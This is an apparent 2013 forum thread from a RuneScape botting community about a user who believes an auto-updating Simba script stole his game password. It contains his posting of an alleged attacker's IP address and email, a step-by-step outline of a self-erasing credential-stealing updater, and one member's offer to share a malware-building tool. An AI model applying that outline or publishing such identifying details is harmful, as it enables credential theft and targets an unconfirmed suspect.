Page 1 of 2 12 LastLast
Results 1 to 25 of 37

Thread: My friend and I were hacked

  1. #1
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default My friend and I were hacked

    A little background information: I've been using Scar/SRL/Simba since 2006 making my own scripts, and profiting greatly from them. Recently I've been busy with pre-med courses and haven't had time to create my own 2007 scripts so instead I've used some other play made scripts. Of course this turned out badly for me, and my account was hacked by one of the scripts on this website. I know this for a FACT because the only account I use SIMBA scripts on was hacked while the other one with 100M+ wasn't touched. Thankfully he only took a few mill, and didn't get my almost maxed pure defence. I've looked through the scripts and my only thought is that through an auto updating script he updated it to a version which steals your pass then quickly updated it to a difference version so it would be hard to be detected.

    I was able to get his IP address and his email address:

    IP: 101.171.85.55
    Email: pinpinpin@live.com

    Just a friendly warning for all of you, and some encouragement to create your own scripts because they will always be MUCH safer.

  2. #2
    Join Date
    Sep 2010
    Posts
    5,762
    Mentioned
    136 Post(s)
    Quoted
    2739 Post(s)

    Default

    NOPE because thousands of people download and the script is open source and somebody would have noticed by now. Also, it gives you a firewall warning if you have security.sex enabled so this should have never happened.

    Sorry about your loss though.

  3. #3
    Join Date
    Sep 2012
    Location
    Here.
    Posts
    2,007
    Mentioned
    88 Post(s)
    Quoted
    1014 Post(s)

  4. #4
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Officer Barbrady View Post
    NOPE because thousands of people download and the script is open source and somebody would have noticed by now. Also, it gives you a firewall warning if you have security.sex enabled so this should have never happened.

    Sorry about your loss though.
    That would be my issue, I didn't have security.sex enabled and I don't see how it wouldn't be possible to have a script auto-update by downloading from a pastebin, rewriting with new source that steals pass, have that run, then redownload a newer version later on.

  5. #5
    Join Date
    Jan 2012
    Posts
    1,596
    Mentioned
    78 Post(s)
    Quoted
    826 Post(s)

    Default

    Quote Originally Posted by Kevin View Post
    How did you get this person's e-mail address?
    Im wondering the same thing too...

  6. #6
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Kevin View Post
    How did you get this person's e-mail address?
    I obtained it because they used my password to get into the email of my account (because they were the same/it was a throw away email), and the set that email as an alternate recovery email to that hotmail/live account.

    Let me post my screenshot on my phone in which the request to change was sent to.

    Screenshot_2013-05-21-14-19-14.jpg

  7. #7
    Join Date
    Sep 2010
    Posts
    5,762
    Mentioned
    136 Post(s)
    Quoted
    2739 Post(s)

    Default

    So if it's a throwaway email it's probably also a "throw away IP"

    AKA vps or what ever.

  8. #8
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Officer Barbrady View Post
    So if it's a throwaway email it's probably also a "throw away IP"

    AKA vps or what ever.
    No, my account was a throw away email because I only use it for RS. Digging further I found that "pinpinpin@live.com" is tied to an account called "Pinzork" on another popular site (found it through searching his email on google).

    Anyways, I'm just posting this as a warning/reminder, and I know 100% it was a script on here. I'll be digging through ALL the sources on my computer when I get home and if I find something I'll post it. Anyways, I've had a great 7 years on this website, and it is my favorite community so no hard feelings what so ever. Thanks for taking your time to read.

  9. #9
    Join Date
    Sep 2012
    Location
    Here.
    Posts
    2,007
    Mentioned
    88 Post(s)
    Quoted
    1014 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    That would be my issue, I didn't have security.sex enabled and I don't see how it wouldn't be possible to have a script auto-update by downloading from a pastebin, rewriting with new source that steals pass, have that run, then redownload a newer version later on.
    A script can't make another script run, so something else would have to be the issue. As opposed to uploading just the username/password protection, is anything uploading the script in its entirety? Just do a ctrl+f on AppPath and paste all cases where it's mentioned.

  10. #10
    Join Date
    Jun 2012
    Posts
    4,867
    Mentioned
    74 Post(s)
    Quoted
    1663 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    No, my account was a throw away email because I only use it for RS. Digging further I found that "pinpinpin@live.com" is tied to an account called "Pinzork" on another popular site (found it through searching his email on google).

    Anyways, I'm just posting this as a warning/reminder, and I know 100% it was a script on here. I'll be digging through ALL the sources on my computer when I get home and if I find something I'll post it. Anyways, I've had a great 7 years on this website, and it is my favorite community so no hard feelings what so ever. Thanks for taking your time to read.
    Please remember to remove your username & pass if you post a script that you found something in (sounds dumb but I never thought I'd do it either )

  11. #11
    Join Date
    Jun 2012
    Location
    Howell, Michigan
    Posts
    1,585
    Mentioned
    34 Post(s)
    Quoted
    553 Post(s)

    Default

    Yeah, remember to remove it, I've done it too

    Also have you purchased any scripts on Sythe? I'm a seller on the site and could easily get someone to give me a review copy of the script you purchased to look over it ect.

    Anything on our site has been downloaded 100+ times, you wouldn't be the first person to notice, sorry for the loss.

  12. #12
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Kevin View Post
    A script can't make another script run, so something else would have to be the issue. As opposed to uploading just the username/password protection, is anything uploading the script in its entirety? Just do a ctrl+f on AppPath and paste all cases where it's mentioned.
    Okay, I just got home from the hospital and I'm searching through my scripts/my friend scripts now.


    Quote Originally Posted by BMWxi View Post
    Please remember to remove your username & pass if you post a script that you found something in (sounds dumb but I never thought I'd do it either )
    I haven't posted any of my scripts or reposted others that I've used. I doubled checked that I didn't send my friend my password either.

    Quote Originally Posted by King View Post
    Yeah, remember to remove it, I've done it too

    Also have you purchased any scripts on Sythe? I'm a seller on the site and could easily get someone to give me a review copy of the script you purchased to look over it ect.

    Anything on our site has been downloaded 100+ times, you wouldn't be the first person to notice, sorry for the loss.
    I don't purchase scripts because there is no need to.


    What if someone did the following (assuming security is off or you've allowed the script):
    - Created a script with an auto-updater that downloads a new version of the script
    - You run the current version of the script
    - Script updates, downloads a new version with something that steals your pass
    - You run this so called new version/insert your details to the newly downloaded version
    - When that script^ is ran it claims that it isn't the newest version and then sends your pass in & downloads the newest version/Rewritefile without the stealer so it isn't apparent that the stealer is there anymore.

    Also, was anyone curious enough to check that IP/email versus accounts registered here?
    Last edited by eddieh20us; 05-21-2013 at 11:37 PM.

  13. #13
    Join Date
    Jun 2012
    Posts
    4,867
    Mentioned
    74 Post(s)
    Quoted
    1663 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Okay, I just got home from the hospital and I'm searching through my scripts/my friend scripts now.




    I haven't posted any of my scripts or reposted others that I've used. I doubled checked that I didn't send my friend my password either.



    I don't purchase scripts because there is no need to.


    What if someone did the following (assuming security is off or you've allowed the script):
    - Created a script with an auto-updater that downloads a new version of the script
    - You run the current version of the script
    - Script updates, downloads a new version with something that steals your pass
    - You run this so called new version/insert your details to the newly downloaded version
    - When that script^ is ran it claims that it isn't the newest version and then sends your pass in & downloads the newest version/Rewritefile without the stealer so it isn't apparent that the stealer is there anymore.

    Also, was anyone curious enough to check that IP/email versus accounts registered here?
    Afaik that's possible, although all the autoupdaters I've seen leave the original file intact.

    As for the IP check, maybe @Justin could take a look?

  14. #14
    Join Date
    Dec 2011
    Location
    Hyrule
    Posts
    8,662
    Mentioned
    179 Post(s)
    Quoted
    1870 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Okay, I just got home from the hospital and I'm searching through my scripts/my friend scripts now.




    I haven't posted any of my scripts or reposted others that I've used. I doubled checked that I didn't send my friend my password either.



    I don't purchase scripts because there is no need to.


    What if someone did the following (assuming security is off or you've allowed the script):
    - Created a script with an auto-updater that downloads a new version of the script
    - You run the current version of the script
    - Script updates, downloads a new version with something that steals your pass
    - You run this so called new version/insert your details to the newly downloaded version
    - When that script^ is ran it claims that it isn't the newest version and then sends your pass in & downloads the newest version/Rewritefile without the stealer so it isn't apparent that the stealer is there anymore.

    Also, was anyone curious enough to check that IP/email versus accounts registered here?
    Depends on where the script auto updates from. If it is from googlecode or github or the like it will have a version history on there. Which scripts are you saying did this?

  15. #15
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Ashaman88 View Post
    Depends on where the script auto updates from. If it is from googlecode or github or the like it will have a version history on there. Which scripts are you saying did this?
    I'd assume github. Heck, I could program exactly what I said in a half hour at most which is the scary thing.

    I've used the following scripts on that account:
    - ElfyyyPC
    - FightcaveCurser
    - GrahahamFisher
    - Practically all the other fight cavers

    What function could be used to upload a file or strings(if possible)? I can grep all the simba scripts to see if any of them have it. The thing is if they did Rewritefile their "hack" code would have been removed the when I updated the script the second attempt.


    Anyway, I've already got the money back plus more. I'm just letting you all know that it's certainly possible for someone to do that AND get away with it. The system isn't fool proof, and I certainly was a fool for trusting the updated version to be safe AND allowing exceptions in the security.
    Last edited by eddieh20us; 05-21-2013 at 11:55 PM.

  16. #16
    Join Date
    Mar 2007
    Posts
    5,125
    Mentioned
    275 Post(s)
    Quoted
    901 Post(s)

    Default


    Forum account issues? Please send me a PM

  17. #17
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Justin View Post
    Thanks for checking Justin. They most likely used a VPS or proxy. You all can lock this thread if you like since I don't have any proof of an exact script that this could have occurred with. I just wanted to point out the possible security flaw that could affect people who are too lazy to check every updated script that they get.

  18. #18
    Join Date
    Mar 2012
    Location
    127.0.0.1
    Posts
    3,383
    Mentioned
    95 Post(s)
    Quoted
    717 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Thanks for checking Justin. They most likely used a VPS or proxy. You all can lock this thread if you like since I don't have any proof of an exact script that this could have occurred with. I just wanted to point out the possible security flaw that could affect people who are too lazy to check every updated script that they get.
    Do you play private servers?

  19. #19
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by NKN View Post
    Do you play private servers?
    Not for 2-3 years, and they were only servers that I was co-owner on.

    I know I wasn't keylogged because my emails, bank accounts, other RS accounts, and what not weren't touched. While this one specific account that I use simba was. Heck, they didn't even access my EOC account with 10B+ on it with all 99s.

  20. #20
    Join Date
    Mar 2012
    Location
    127.0.0.1
    Posts
    3,383
    Mentioned
    95 Post(s)
    Quoted
    717 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Not for 2-3 years, and they were only servers that I was co-owner on.

    I know I wasn't keylogged because my emails, bank accounts, other RS accounts, and what not weren't touched. While this one specific account that I use simba was. Heck, they didn't even access my EOC account with 10B+ on it with all 99s.
    Have you ran Malwarebytes or w/e it is?

  21. #21
    Join Date
    Jun 2012
    Location
    Howell, Michigan
    Posts
    1,585
    Mentioned
    34 Post(s)
    Quoted
    553 Post(s)

    Default

    If the script did that, just redownload it and then run the auto updater, then check instead of running it? Am I really the only one here who smells the bandwagon effect lately on hackings...I mean I've seen an influx, but seriously, I bet I could find another source of the hacking withing 20 minutes of touching your computer. In computers there is no such thing as knowing for a fact. Unless you know every file on your computer, where it came from ect. You have no way of saying, I know for a "fact" it was nothing but a simba script.

    I really do appreciate that you are not like "samba haxorzed mi acctz bro" but I am fairly certain I could find the actual suspect in under half an hour. Why? Well I learned how to make them and crypt them and use them on HF, I thought what the heck, why not? I've been hacked before ( completely my fault Btw ) and figured I would learn how they did it.

    My point is, if the scripts you used we're open source, it wasn't Simba, end of story. The probability alone kills that idea. However it could easily have been an accidental visit to a website, could have been sleeping from the old Java exploit, I mean you are telling me you are god on Internet security? I run malware bits, avg, avast, spyware bot ect inna daily basis at night to clean my computer and can still end up having to hand quarantine a virus.

    If you would like, PM me and I will send you a link to download a program on HF used to create malware, it also contains a "cure" which will kill anything that you may have downloaded on accident, or even just picked up at a website. The main idea behind the "cure" is to test the created virus, logger or w/e you made on your computer, then the "cure" fixes your computer. It will work even when the malware is crypted.

    I'm not ripping on you, you were open and kind about it ( amazing to see<3 and I appreciate it ) but Inam tired of reading the hacking threads, it wasn't an OPEN source simba script on our site, private scripts I can't tell you as it depends on the scripter, how trustworthy they are, where they are from ect..

    So, I will be more than happy to send anybody the link who wants it, also anybody claiming "that will just hack me" I will just be sending a link, I can send it to a mod as well. I just don't think I'm allowed to post a link to something that creates malware.

    So cheers all, and at OP I'm glad you have the bank back(:
    Last edited by King; 05-22-2013 at 03:05 AM.

  22. #22
    Join Date
    Dec 2011
    Location
    Hyrule
    Posts
    8,662
    Mentioned
    179 Post(s)
    Quoted
    1870 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    I'd assume github. Heck, I could program exactly what I said in a half hour at most which is the scary thing.

    I've used the following scripts on that account:
    - ElfyyyPC
    - FightcaveCurser
    - GrahahamFisher
    - Practically all the other fight cavers

    What function could be used to upload a file or strings(if possible)? I can grep all the simba scripts to see if any of them have it. The thing is if they did Rewritefile their "hack" code would have been removed the when I updated the script the second attempt.


    Anyway, I've already got the money back plus more. I'm just letting you all know that it's certainly possible for someone to do that AND get away with it. The system isn't fool proof, and I certainly was a fool for trusting the updated version to be safe AND allowing exceptions in the security.
    Go see what those scripts use. If it is github like you said, github shows the revision history so you can see if there have been any malicious updates.

  23. #23
    Join Date
    Jun 2012
    Posts
    4,867
    Mentioned
    74 Post(s)
    Quoted
    1663 Post(s)

    Default

    I'd like to say that the open source argument only really works when people read the code. Of course, with the high volume of people we have here there is a high chance that someone who knows what they're doing has read the code, but that's not certain. I know personally I ran ShatterFighter without reading through all of it. Do I think it has anything bad in it? No. Do I know? No, because I haven't read all of it. However, I trust ShatterHand, and I also am comforted by the fact that the source is open to open to read should anyone wish to. Oh and before people start saying things, the reason I chose that script as an example was because it is a script that I didn't write that I've used in the past, used recently, and plan to use again.

    TLDR; If you don't trust a script, read through the code yourself or don't use it.

  24. #24
    Join Date
    Jul 2012
    Posts
    437
    Mentioned
    10 Post(s)
    Quoted
    165 Post(s)

    Default

    Quote Originally Posted by Kevin View Post
    A script can't make another script run, so something else would have to be the issue. As opposed to uploading just the username/password protection, is anything uploading the script in its entirety? Just do a ctrl+f on AppPath and paste all cases where it's mentioned.
    Pretty sure it's not hard to do.
    *removed*('C:\...\***.exe');// you just need a create the .exe file that launches and runs a script

  25. #25
    Join Date
    Mar 2006
    Location
    Belgium
    Posts
    3,564
    Mentioned
    111 Post(s)
    Quoted
    1475 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Not for 2-3 years, and they were only servers that I was co-owner on.

    I know I wasn't keylogged because my emails, bank accounts, other RS accounts, and what not weren't touched. While this one specific account that I use simba was. Heck, they didn't even access my EOC account with 10B+ on it with all 99s.
    Did u guys use paste.villavu.com by any chance? Some people forget to remove their passwords there.
    I saw it happen on few occasions

    Creds to DannyRS for this wonderful sig!

Page 1 of 2 12 LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •